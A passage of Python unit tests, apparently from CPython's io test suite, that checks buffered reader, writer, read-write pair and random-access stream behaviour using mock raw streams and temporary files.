bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
        # _pyio.BufferedReader seems to implement reading differently, so
        # checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
        # The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
        # The Python version has __del__, so it ends up in gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
            # Overwriting should rewind the raw stream if needed
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
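        # Illustrative trace (not used by the assertions): mutate(bufio, 1, 3)
        # on b"\x80\x81\x82\x83\x84" reads positions 1-2, writes b'\x02' at
        # position 3, then seeks back and writes b'\x01' at position 1, so the
        # flushed raw value is b"\x80\x01\x82\x02\x84", matching the
        # `expected` bytearray computed below for i=1, j=3.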
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
